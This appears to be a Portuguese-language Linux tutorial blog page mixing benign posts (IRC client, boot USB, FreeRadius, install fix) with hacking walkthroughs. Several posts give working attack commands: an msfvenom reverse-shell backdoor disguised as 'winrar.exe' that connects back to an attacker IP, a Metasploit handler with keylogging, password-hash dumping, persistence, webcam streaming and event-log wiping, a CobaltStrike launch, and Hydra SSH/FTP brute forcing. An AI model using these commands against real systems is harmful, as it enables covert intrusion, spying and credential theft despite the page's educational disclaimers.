Tutoriais

Tutoriais

Tutoriais prefirolinux

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Invadindo Webcam conectada no windows com “Kali Linux”

3

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Criando Pendrive de Boot do Linux no Mac por linha de comando

0

Boas Users!

Criaremos um pendrive de boot no OS X

1- Conecte o pendrive no Mac, e acesse um terminal pelo Spotlight (⌘ + Tecla Espaço) ou diretamente através do diretório /Applications/Utilities/

2- Execute o seguinte comando no terminal, ” diskutil list ” o retorno do comando pode variar de acordo com o Mac

$diskutil list

1

3- Identifique o disco relativo ao Pendrive, neste caso, é o disk1

2

4- Desmonte o disco, com o comando “diskutil unmountDisk

$diskutil unmountDisk /dev/disk1

3

5- Com o comando o disco esteja desmontado, você poderá acessa-lo e altera-lo à baixo nível.

Localize a imagem ISO que deseja gravar no Pendrive ou copie-a para um local de fácil “acesso”.

Para efetuar a cópia, iremos utilizar o utilitário dd, o qual já se encontra disponível no Mac OS X.

Para saber mais sobre o dd, basta consultar o Manual, digitando “man dd” no Terminal.

A sintaxe básica do dd é:

dd if=origem of=destino

6- Substitua origem e destino, pelo arquivo ISO e pelo disco de destino respectivamente, logo teremos algo semelhante à:

dd if=ubuntu-13.04-server-amd64.iso of=/dev/rdisk1 bs=128m

OBS: Note que, para acelerar o processo de cópia, complementamos o comando, definindo parâmetro block size (bs) como 128m e alteramos o disco de destino incluindo um “r” antes de “disk1“.

bs indica que os blocos de leitura e escrita devem possuir o mesmo tamanho, enquanto que o “r” define que o disco deve ser acessado no modo raw.

Quando o processo de cópia for concluído, você receberá uma mensagem informando o tempo decorrido e a quantidade de bytes transferidos.

Tudo pronto, agora basta desconectar o Pendrive e utiliza-lo.

 

By user777

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777

Configurando Servidor FreeRadius + Mysql para PPPOE no Mikrotik(Parte 1)

0

Fala meus bons e amados irmãos de guerra, hoje vamos ver em simples passos como criar um um servidor de Radius para autenticação de usuários do mikrotik em pppoe no servidor Mysql.

 

Basicamente a estrutura se resume no seguinte.
* Essa RB ai é só pra descrever o que usei.
Rb com 5 portas, rodando RouterOs 5.25

Turnkey linux 14 baseado no Debian Jessie 8

Freeradius + Mysql
Na nossa routerboard temos 5 portas, usaremos apenas 3, uma para comunicação com o servidor radius, uma para rede de clientes e uma para conexão com a internet.

O Cenário é basicamente esse abaixo:

Radius

RB – Porta Ether1 > 10.2.2.13/28 (Internet)

RB – Porta Ether3 > 10.1.1.1/24 (Conexão com o Freeradius)

RB – Porta Ether5 > 10.2.3.1 (Com pool para Clientes PPPoE)

Linux Server – eth0 : 10.1.1.10/24

Cliente 10.2.3.150 (Endereço Já entregue pelo PPPoE após discar)

Bom, o procedimento é bem simples como descrito no vídeo, que embora um pouco longo é bem satisfatório.

 

 

Bom, basicamente é isso. O restante do conteúdo pode ser visto no vídeo.

Abraços, e vamos a parte 2

Estará disponível AQUI

 

[ x ]
 

 

 

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777

Hydra – Brute Force – Realizando pequeno ataque de força bruta.

1

Bom , neste pequeno Artigo vamos entender de forma básica o funcionamento do Hydra.
Para isso, me conectei ao meu kali linux de forma remota na porta ssh e procedi com todos os passos usados para se fazer um ataque de brute force, lembrando que o fato de estar conectado via ssh não me impede de usar os programas que rodam em modo terminal, impediria de usar os pacotes que necessitem de uma interface gráfica para tal.
Bom, é importante ressaltar que estou usando um ambiente de testes, o “host alvo” é de minha propriedade e este post serve apenas paras fins de analise e estudo, não fazendo apologia a invasão. Também não me responsabilizarei por eventuais danos causados a terceiros pelo uso incorreto dessa ferramenta..

 

Aqui temos a versão do Kali que estou rodando.

Bom, o Hydra como muitos conhecem é um programa open source disponibilizado nativamente no Kali Linux, tendo também o codigo fonte disponível para download no repositório oficial do projeto. E quanto a instalação do pacote, esta não será abordada nestas minhas pequenas linhas de raciocinio.

Quem quiser saber mais sobre o Hydra pode diretamente no terminal rodar o man do programa, bastando para isso…

root@love:~# man hydra

Ele dará todas as informações necessárias para que você o conheça melhor, podendo assim planejar e executar diferentes ataques.

Neste exemplo usei como alvo uma Routerboard 433AH rodando Router OS e com usuário previamente cadastrado. Falando em hydra, é sempre interessante ter, pelo menos, o nome de usuário que será usado durante o ataque.
A senha cadastrada foi incluída no nosso arquivo de senhas, qual será usado pelo hydra para realizar os testes de login e assim verificar o password correto.

Bom, vamos ao que realmente interessa. De posse do seu Terminal, crie um arquivo onde você possa inserir prováveis senhas(veja, estamos trabalhando com prováveis senhas , aquelas que imaginamos ser usadas pelo usuario vitima do ataque.) para que possamos realizar nosso pequeno e singelo ataque.
No Terminal, crie então um arquivo, o nome pode ser qualquer um.

root@love:~# nano pass.txt

Neste arquivo insira as senhas, caso use uma lista pre definida.

 

Após termos nossa base de dados de password já pronta, vamos então verificar quais serviços o nosso host vitima está rodando, quais portas estão abertas e que possam ser testadas pelo Hydra.

root@love:~# nmap -v 10.2.2.1

Constatada as portas abertas, podemos prosseguir com nosso propósito, atacar e obter o password.
Então, vamos invocar o Hydra de forma a usar o arquivo “pass.txt” como base para as senhas.

root@love:~# hydra -l kali -P pass.txt 10.2.2.1 ssh


Explicando a linha:
Hydra: invocamos o programa a ser executado, no caso obviamente o Hydra.
O menos L minusculo “-l” especifica login(vide man hydra).
Kali= Nome do usuário a ser testado (como disse acima, user previamente cadastrador por mim)
O “-P” maiúsculo especifica um arquivo contendo senhas, caso fosse “-p” minúsculo poderíamos especificar somente um password por vez.
Pass.txt é obviamente nosso arquivo com as passwords.
10.2.2.1 é o host alvo do ataque e o SSH no final da linha indica o serviço(porta) a ser testada.

Feito isso, basta correr o comando, damos {Enter} e aguardamos que os testes se concluam. Dependendo do tamanho do seu arquivo de senhas e da complexidade isso pode demorar muito tempo… 😉

Olha, que lindo, aqui já podemos ver que o Hydra encontrou o password do usuário Kali. Isso após alguns segundos somente.

Vamos fazer um teste via ssh?

Pronto, conectado…!
Realmente funciona, e realmente da para fazer ataques de níveis bem diferentes deste, por exemplo, caso eu quisesse testar também uma serie de senhas para o protocolo(serviço ftp) bastava a mim mudar ou especificar no fim da linha onde invoco o Hydra o serviço, para um ftp teríamos:

 

root@love:~# hydra -l kali -P passftp.txt 10.2.2.1 ftp

Bom amigos, por hoje e só por hoje é só! Hehe
O hydra é um velho companheiro, e se vocẽ quiser realmente aprender sobre ele não se esqueça de ler a man do programa, não existe tutorial/artigo que se compare a qualidade das informações disponíveis lá.

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777